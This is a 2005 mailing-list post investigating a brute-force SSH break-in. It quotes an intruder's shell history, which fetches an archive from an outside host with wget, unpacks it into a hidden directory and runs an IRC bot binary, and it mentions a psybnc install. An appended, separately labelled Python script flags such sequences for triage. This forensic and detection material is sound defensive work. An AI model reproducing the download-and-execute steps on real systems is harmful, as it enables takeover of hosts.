brute force ssh attack
Daniel Kirsten
Daniel.Kirsten at gmx.net
Wed Apr 27 13:41:23 UTC 2005
>Were there any interesting files in the users' home directories? (Look for
>hidden files too, of course -- maybe a hidden directory named ... or
>something.) Also check in /tmp and /var. And any luck with the
>.bash_history? (For both the users and for root....)
This is ~daikanyama/.bash_history:
passwd
ls
w
wget www.ring.as.ro/x/qwe.tgz
tar zxvf qwe.tgz
rm -rf qwe.tgz
cd .undernet
./mech
./mech
./mech
./mech
There is a complex directory tree under ~daikanyama/.undernet.
There are no interesting files under ~kevin.
Kevin had tcsh as login shell. Using ps aux, I have seen that kevin
used ftp, and kevin also used passwd.
One of the users compiled something, I have seen that they utilized
"make". Kevin installed some program psybnc under /var/tmp
There is nothing interesting in /tmp and /root (root has tcsh as
login shell).
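Added example (not part of the original post, and not code from either poster): a small Python triage pass over a shell history that flags the sequence visible in the history quoted above, namely a password change, a remote download, unpacking and deleting the downloaded archive, entering a hidden directory (including one named "..."), and running a local binary. The function name triage_history, the rule labels and the command lists are assumptions made for this illustration.

```python
import shlex
from collections import Counter

# Sample input: the ~daikanyama/.bash_history quoted in the post above.
SAMPLE_HISTORY = """passwd
ls
w
wget www.ring.as.ro/x/qwe.tgz
tar zxvf qwe.tgz
rm -rf qwe.tgz
cd .undernet
./mech
./mech
./mech
./mech
""".splitlines()

FETCHERS = {"wget", "curl", "fetch", "ftp"}   # assumed list of download tools
UNPACKERS = {"tar", "unzip", "gunzip"}        # assumed list of archive tools

def triage_history(lines):
    """Return (findings, run_counts); findings are (line_no, rule, command)."""
    findings, fetched, unpacked, runs = [], set(), set(), Counter()
    for no, raw in enumerate(lines, 1):
        try:
            argv = shlex.split(raw)
        except ValueError:            # unbalanced quotes: split on whitespace
            argv = raw.split()
        if not argv:
            continue
        cmd, args = argv[0], [a for a in argv[1:] if not a.startswith("-")]
        names = {a.rstrip("/").rsplit("/", 1)[-1] for a in args}  # basenames
        if cmd == "passwd":
            findings.append((no, "password-change", raw))
        elif cmd in FETCHERS:
            fetched |= names          # remember what was pulled in
            findings.append((no, "remote-download", raw))
        elif cmd in UNPACKERS and names & fetched:
            unpacked |= names & fetched
            findings.append((no, "unpack-downloaded", raw))
        elif cmd == "rm" and names & unpacked:
            findings.append((no, "delete-after-unpack", raw))
        elif cmd == "cd" and any(n.startswith(".") and n not in (".", "..") for n in names):
            findings.append((no, "hidden-directory", raw))
        elif cmd.startswith("./"):
            runs[cmd] += 1
            if runs[cmd] == 1:        # report the first run; count the rest
                findings.append((no, "local-binary-run", raw))
    return findings, dict(runs)
```

Run it over each user's and root's history file; an empty or missing history on a compromised account is itself worth noting, since the history is easy to truncate.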